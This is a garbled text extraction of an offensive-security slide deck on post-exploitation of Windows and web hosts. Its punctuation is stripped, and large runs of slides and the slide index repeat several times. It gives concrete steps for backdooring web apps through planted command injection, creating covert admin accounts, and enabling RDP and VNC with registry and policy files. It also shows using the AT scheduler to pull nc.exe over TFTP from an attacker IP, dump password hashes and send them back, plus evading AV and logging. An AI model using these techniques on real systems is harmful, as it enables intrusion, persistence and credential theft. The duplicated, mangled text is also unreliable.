Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
